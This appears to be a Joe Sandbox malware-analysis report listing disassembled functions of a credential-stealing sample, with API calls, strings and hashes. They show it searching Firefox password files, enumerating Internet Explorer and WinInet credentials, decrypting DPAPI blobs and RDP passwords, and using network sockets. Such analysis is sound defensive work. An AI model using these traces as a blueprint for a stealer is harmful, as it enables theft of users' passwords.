Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: closesocketconnect
String ID:
API String ID: 1323028321-0
Opcode ID: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
Instruction ID: be6505267f29f4178e4e45716bfd2a082c1c90b363e213ca25923fe40938077a
Opcode Fuzzy Hash: d6c968b658abe3d36e81043180a00b0d96a7d8992d9790436992e27dcae3281c
Instruction Fuzzy Hash: 78D0C9B1A0020879D710DABA5DC29FEA65DAB10328F105E3BB526E12C1E5BDC5845E29

Function 004037E3 Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00403711: select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756

recv.WSOCK32(?,?,00000800,00000000), ref: 0040382D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: de3fe264493f79aaef43602abc316456185a8866abbfc431ee1fb239a53e31dc
Instruction ID: 323a9da6d9ca5a96abf8ccc2a690c220014aa7d17c9f691bfb2ea616bb951e21
Opcode Fuzzy Hash: de3fe264493f79aaef43602abc316456185a8866abbfc431ee1fb239a53e31dc
Instruction Fuzzy Hash: 9F014472600309ABDB10AE6ACC41BAB7FDCBB10346F20C577B911E62C0D778DF559A99

Function 004036C5 Relevance: 1.5, APIs: 1, Instructions: 32networkCOMMON

Download Yara Rule

APIs

send.WSOCK32(?,?,00000000,00000000), ref: 004036EC

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
Instruction ID: be9ef6ce2d4025a438cc5a6b6f313f8180328372e462bd93b64e20afe6ef20d9
Opcode Fuzzy Hash: 6796e4a979f46f7e14b9463c85c033f8f1df5933707a7bbe8b597650c4fb955e
Instruction Fuzzy Hash: 88F0A072300248EBDB104E55DC40B5B3B58E791369F20443BFA01A73C1D3BAEA918758

Function 00403711 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 00403756

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: select
String ID:
API String ID: 1274211008-0
Opcode ID: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
Instruction ID: e8c92696a27f7789f9168a37488be3243172b4df61387a138d61a6e4929c29f7
Opcode Fuzzy Hash: 589277c18e245aacdd3829cde8053bbf312a351eb7740a65391bf8dbcda2696d
Instruction Fuzzy Hash: C8F037B551011CAEDB209F14CC51BD9BB78EB14714F1081A1E558E61D0D7F59BC48F55

Function 00403BF8 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
Instruction ID: 9de39b6423a18e4b635914f995573c2f828d2e73ec19ed757491c159e372b79a
Opcode Fuzzy Hash: 31c99b0a74ce9338f0b04b6a28a6c6564a948aa46e863f54856cd2301dc91045
Instruction Fuzzy Hash: 9AD0A77054020CB1D710D740CD03EDD72785F00708F108230B750BA1E1E7F55B88934D

Function 00403E3C Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00403E51

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
Instruction ID: 408fbaf15a75b0da35fbc24d3226a342d8ed0cf0f325acef7b37683ef5936850
Opcode Fuzzy Hash: ffab5162380fe3af86914e81f9cfe18dae7339984c6a2ef45e840d9542290845
Instruction Fuzzy Hash: 5FB0923161020836EA10E6958C439DA729D4744748F4001A13A59D12C2EEE5AAC04AEA

Function 0040100F Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00401016

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
Instruction ID: b431a99ddbd6f298bdb6c6cbc4e5d632e74455fe4781730d40ac7f96afd32023
Opcode Fuzzy Hash: 421d0a860c6d9d165e723f529cb45f0477ca61d72d068e36a6a36305f6e12bb0
Instruction Fuzzy Hash: 37A0223238020030EE00EB808C83FCE28030B2CB8CF008022B3082C0C0C0FEC0E0C228

Function 004018A0 Relevance: 1.3, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: FreeLocal
String ID:
API String ID: 2826327444-0
Opcode ID: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
Instruction ID: 500c98066f7ad2306fab3d815ea7ca12909582ff6fddbe18178bd9c5c23c3a43
Opcode Fuzzy Hash: c09eb3dfaaad0fcb77e880224629c9a10ca60c10ba5b4db41bc18a076b99674a
Instruction Fuzzy Hash: 42C09B3210060C56DB116F25D949B9E79D4575034CF40C2376D05645B1D6B8D6D0C5D8

Function 004018B7 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
Instruction ID: 0df91a5887059c29a5536f2b37c104e83e237d577eaeef3e17dd13c7587ff9d4
Opcode Fuzzy Hash: bfd43a2e21fc68efd9c566fc8633d8267606145764da389cb582ccf157877ab6
Instruction Fuzzy Hash: 0FB092B124020827E250AA49C803F5A738C9B10B8CF408122BB44A6282C8A8F89042BD

Non-executed Functions

Function 0040966C Relevance: 31.7, APIs: 11, Strings: 7, Instructions: 169filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 004096DC
lstrcmpiA.KERNEL32(00415055,?), ref: 00409709
lstrcmpiA.KERNEL32(00415057,?), ref: 00409726
FindNextFileA.KERNEL32(?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098BC
FindClose.KERNEL32(?,?,?,00000000,00000000,?,signons2.txt,00000000,?,signons.txt,?,?,signons.sqlite,00000000,?), ref: 004098CF

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

\*.*, xrefs: 0040969C
signons.sqlite, xrefs: 004097DB
signons3.txt, xrefs: 00409863
*.*, xrefs: 004096AB
prefs.js, xrefs: 00409795
signons2.txt, xrefs: 00409852
signons.txt, xrefs: 00409841

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*$prefs.js$signons.sqlite$signons.txt$signons2.txt$signons3.txt
API String ID: 3040542784-1405255088
Opcode ID: 8ef0bd30fd04ccc02a0c98e2e208e9dec4010ee5d9356605653cd91f4535d2e8
Instruction ID: c3a02d17520d638cdef0a049c0bca35e5551917b56ae0849102c1ffe2bdac06f
Opcode Fuzzy Hash: 8ef0bd30fd04ccc02a0c98e2e208e9dec4010ee5d9356605653cd91f4535d2e8
Instruction Fuzzy Hash: FF516271911109AAEF21BF21CD42AEE7B6AAF41348F10847BB508711F3DB7D8ED09E59

Function 00402B2A Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

explorer.exe, xrefs: 00402BB0

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: explorer.exe
API String ID: 0-3187896405
Opcode ID: 53999b05d3ebfcf22466a56dc9069ff60c37fa3ad5b4a7ad1a0a153dcaa2926f
Instruction ID: d74b17844073f6ad73c2ef0740f1ad8b606c63cad5e558ade9292410ef416c20
Opcode Fuzzy Hash: 53999b05d3ebfcf22466a56dc9069ff60c37fa3ad5b4a7ad1a0a153dcaa2926f
Instruction Fuzzy Hash: 16311B30904219ABEB21AF65DE89BEE7AB4BB04304F1041B7E515B11E1DBB89FC5CE19

Function 00410042 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

123456, xrefs: 00410125, 00410139
, xrefs: 0041014D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID:
String ID: $123456
API String ID: 0-521589362
Opcode ID: fd853e0a5e10fc8e3b9843264a2a8354f495f8006752088b2b27e88e418dc1b7
Instruction ID: 78c51aa61b9f298970356f298b49bb9ccc83472d8004ff69d171fc0def4cdeb3
Opcode Fuzzy Hash: fd853e0a5e10fc8e3b9843264a2a8354f495f8006752088b2b27e88e418dc1b7
Instruction Fuzzy Hash: 12513C75900208EBEF119FA1DD45BDEBF75EB04304F548066E504A91A2D7FE8AC4DB28

Function 0040A391 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0E3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A11C
Part of subcall function 0040A0E3: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A125

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A3C5
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A44F
lstrcmpiA.KERNEL32(?,WininetCacheCredentials), ref: 0040A46E
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords), ref: 0040A48D
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A4A6
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040A4EC
LocalFree.KERNEL32(?), ref: 0040A519
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A543

Strings

MS IE FTP Passwords, xrefs: 0040A481
DPAPI: , xrefs: 0040A49A
WininetCacheCredentials, xrefs: 0040A462
Internet Explorer, xrefs: 0040A443

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 2957877119-3076635702
Opcode ID: 628dcc5975db115a4b437a74713bac74da5025d16274bd754d5c749705ce595c
Instruction ID: 8a3d0d4347acad4b0b1021bdaf5da09c6d4d834d08eecca3032b506426e80688
Opcode Fuzzy Hash: 628dcc5975db115a4b437a74713bac74da5025d16274bd754d5c749705ce595c
Instruction Fuzzy Hash: C0412A7290021CAADF219F50CC42FD97AB9BF04304F0484E9F64475090DBB99AE59FD9

Function 0040BA61 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040BB18
LocalFree.KERNEL32(00000000,?), ref: 0040BB53
lstrlenA.KERNEL32(ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BB94
StrCmpNIA.SHLWAPI(?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBA2
lstrlenA.KERNEL32(http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBB0
StrCmpNIA.SHLWAPI(?,http://,00000000,http://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBBE
lstrlenA.KERNEL32(https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBCC
StrCmpNIA.SHLWAPI(?,https://,00000000,https://,?,ftp://,00000000,ftp://,?,?,00000000,00000000,00000000,?), ref: 0040BBDA

Strings

ftp://, xrefs: 0040BB8F, 0040BB9A
https://, xrefs: 0040BBC7, 0040BBD2
http://, xrefs: 0040BBAB, 0040BBB6

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: lstrlen$CryptDataFreeLocalUnprotect
String ID: ftp://$http://$https://
API String ID: 3968356742-2804853444
Opcode ID: 42abdbd7ac9c4f3a616ab5156f2668bfe113570481195958dbe35809a0e690ed
Instruction ID: 49192131c74e6ecdd2ef0c7c9bbab6257bdf88749b5c52d7cb57f463f4db32fe
Opcode Fuzzy Hash: 42abdbd7ac9c4f3a616ab5156f2668bfe113570481195958dbe35809a0e690ed
Instruction Fuzzy Hash: 9451D73291010DFADF11AB91ED41EEEBB7AEF08704F10813AF511B11A1DB799A90DB9C

Function 0040879B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104filestringCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 0040880B
lstrcmpiA.KERNEL32(00415055,?), ref: 00408834
lstrcmpiA.KERNEL32(00415057,?), ref: 00408851
FindNextFileA.KERNEL32(?,?,?,?,00000000,?), ref: 004088F8
FindClose.KERNEL32(?,?,?,?,?,00000000,?), ref: 0040890B

Part of subcall function 00401C3F: lstrlenA.KERNEL32(?), ref: 00401C60
Part of subcall function 00401C3F: lstrlenA.KERNEL32(00000000,?), ref: 00401C6A
Part of subcall function 00401C3F: lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 00401C7E
Part of subcall function 00401C3F: lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 00401C87

Strings

\*.*, xrefs: 004087CB
*.*, xrefs: 004087DA

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: Find$Filelstrcmpilstrlen$CloseFirstNextlstrcatlstrcpy
String ID: *.*$\*.*
API String ID: 3040542784-1692270452
Opcode ID: 1bdc7870ad022e8b44980ebbd08f430bd2bb77dcaac7f4fca6e7281557a90ceb
Instruction ID: d1e9c4525f7b2ad28abf06ab24d8b5a81993df8fef6bfad870924647b3c027b9
Opcode Fuzzy Hash: 1bdc7870ad022e8b44980ebbd08f430bd2bb77dcaac7f4fca6e7281557a90ceb
Instruction Fuzzy Hash: A4314171900219AAEF21BF21CD41AED7769AF04344F5084BFB548B50F2DF7D8AD0AA59

Function 0040CC68 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 116stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000), ref: 0040CD0D
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040CD73
LocalFree.KERNEL32(00000000), ref: 0040CD9A

Strings

password 51:b:, xrefs: 0040CCCC
username:s:, xrefs: 0040CCB9
full address:s:, xrefs: 0040CCDF

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID: full address:s:$password 51:b:$username:s:
API String ID: 2920030623-2945746679
Opcode ID: b91112a289d1823270cca11f2669fd3e80525b76d755f2f272bf2885eb7575dd
Instruction ID: 549b8bfe15727caff0bde4e7f7b0c590c8d751f77b2d72e8e93019e0b323c222
Opcode Fuzzy Hash: b91112a289d1823270cca11f2669fd3e80525b76d755f2f272bf2885eb7575dd
Instruction Fuzzy Hash: A8413632810109EAEF11ABE1C986BEEBF75EF44314F10413BE600B11E0D7794A92DBA9

Function 0040A798 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88stringencryptionCOMMON

Download Yara Rule

APIs

CredEnumerateA.ADVAPI32(Microsoft_WinInet_*,00000000,00000000,00000000), ref: 0040A80A
lstrlenW.KERNEL32(00416408,?,?,00000000), ref: 0040A848
CryptUnprotectData.CRYPT32(00000000,00000000,?,00000000,00000000,00000001,?), ref: 0040A878
LocalFree.KERNEL32(00000000), ref: 0040A8AA
CredFree.ADVAPI32(00000000), ref: 0040A8C8

Strings

Microsoft_WinInet_*, xrefs: 0040A805

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CredFree$CryptDataEnumerateLocalUnprotectlstrlen
String ID: Microsoft_WinInet_*
API String ID: 3891647360-439986189
Opcode ID: 5bf2b6e95422933bad89ea4b2930b37d8afdc90123607db899028e35c1490e96
Instruction ID: 1d55b2d42a3acdf31990dc6a5571002e4569f126bc48c3af6f451ef0ef2cae1b
Opcode Fuzzy Hash: 5bf2b6e95422933bad89ea4b2930b37d8afdc90123607db899028e35c1490e96
Instruction Fuzzy Hash: EE314072850318EFEF209F84DD05BEEB7B4AB04304F14807AE540721E1D7B89AD5CB5A

Function 0040A94F Relevance: 4.6, APIs: 3, Instructions: 121stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 0040A964
CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 0040AA1C
LocalFree.KERNEL32(00000000), ref: 0040AA4F

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotectlstrlen
String ID:
API String ID: 2920030623-0
Opcode ID: 9ebb5da82d9580daab5f6dcce4e5cb029b162b30a380e72508a4c24b0859e133
Instruction ID: 79cf8318b5822fa2118a75dc7cffc68aed8f1e25df8911532b1ba46c544678e6
Opcode Fuzzy Hash: 9ebb5da82d9580daab5f6dcce4e5cb029b162b30a380e72508a4c24b0859e133
Instruction Fuzzy Hash: 4431C7B27002089BEF209E64D9447CEB765EB85360F518433E951A62C0D27C9A92CF5E

Function 00404313 Relevance: 4.6, APIs: 3, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404372
CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0040438E
FreeSid.ADVAPI32(?), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: dfdde712d65b464cac016b7d8a8f652ff5f99432e6daf67212fb73d3612290a2
Instruction ID: ccb9488a43648f7677540bf893c3bc3346a108dc4f9de2e3a9ad559ae56b331d
Opcode Fuzzy Hash: dfdde712d65b464cac016b7d8a8f652ff5f99432e6daf67212fb73d3612290a2
Instruction Fuzzy Hash: 89114070608248EEEB11CB94DC1EBDE7BF4AB5030DF0980F5D554AA2E2D3B9E508C75A

Function 0040421D Relevance: 3.1, APIs: 2, Instructions: 57encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
LocalFree.KERNEL32(00000000), ref: 0040429D

Memory Dump Source

Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd

Yara matches

Similarity

API ID: CryptDataFreeLocalUnprotect
String ID:
API String ID: 1561624719-0
